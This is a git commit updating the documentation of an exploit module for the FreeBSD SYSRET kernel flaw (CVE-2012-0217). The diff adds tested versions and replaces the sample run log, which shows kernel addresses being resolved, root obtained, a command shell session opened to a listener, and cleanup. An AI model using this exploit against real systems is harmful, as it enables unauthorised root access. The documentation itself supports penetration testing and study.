Update documentation

master
Brendan Coles 2018-12-14 11:00:18 +00:00
parent e4fc4e654d
commit 1cf5c79cc8
1 changed files with 31 additions and 9 deletions

View File

@ -1,7 +1,7 @@
## Description
This module exploits a vulnerability in the FreeBSD 9.0-RELEASE (x64)
kernel, when running on 64-bit Intel processors.
This module exploits a vulnerability in the FreeBSD kernel,
when running on 64-bit Intel processors.
By design, 64-bit processors following the X86-64 specification will
trigger a general protection fault (GPF) when executing a SYSRET
@ -15,7 +15,10 @@
## Vulnerable Application
This module has been tested successfully on FreeBSD 9.0-RELEASE.
This module has been tested successfully on:
* FreeBSD 8.3-RELEASE (amd64)
* FreeBSD 9.0-RELEASE (amd64)
## Verification Steps
@ -64,12 +67,31 @@
[*] Max line length is 131073
[*] Writing 218 bytes in 1 chunks of 614 bytes (octal-encoded), using printf
[*] Launching exploit...
[*] [+] SYSRET FUCKUP!!
[*] [+] Start Engine...
[*] [+] Crotz...
[*] [+] Crotz...
[*] [+] Crotz...
[*] [+] Woohoo!!!
[*] CVE-2012-0217 Intel sysret exploit -- iZsh (izsh at fail0verflow.com)
[*]
[*] [*] Retrieving host information...
[*] [+] CPU: GenuineIntel
[*] [+] sysname: FreeBSD
[*] [+] release: 9.0-RELEASE
[*] [+] version: FreeBSD 9.0-RELEASE #0: Tue Jan 3 07:46:30 UTC 2012 root@farrell.cse.buffalo.edu:/usr/obj/usr/src/sys/GENERIC
[*] [+] machine: amd64
[*] [*] Validating target OS and version...
[*] [+] Vulnerable :-)
[*] [*] Resolving kernel addresses...
[*] [+] Resolved Xofl to 0xffffffff80b02e70
[*] [+] Resolved Xbnd to 0xffffffff80b02ea0
[*] [+] Resolved Xill to 0xffffffff80b02ed0
[*] [+] Resolved Xdna to 0xffffffff80b02f00
[*] [+] Resolved Xpage to 0xffffffff80b03240
[*] [+] Resolved Xfpu to 0xffffffff80b02fc0
[*] [+] Resolved Xalign to 0xffffffff80b03080
[*] [+] Resolved Xmchk to 0xffffffff80b02f60
[*] [+] Resolved Xxmm to 0xffffffff80b02ff0
[*] [*] Setup...
[*] [+] Trigger code...
[*] [+] Trampoline code...
[*] [*] Fire in the hole!
[*] [*] Got root!
[+] Success! Executing payload...
[*] Command shell session 2 opened (123.123.123.188:4444 -> 123.123.123.136:61024) at 2018-12-09 10:40:16 -0500
[+] Deleted /tmp/.mTaR4rAPd.c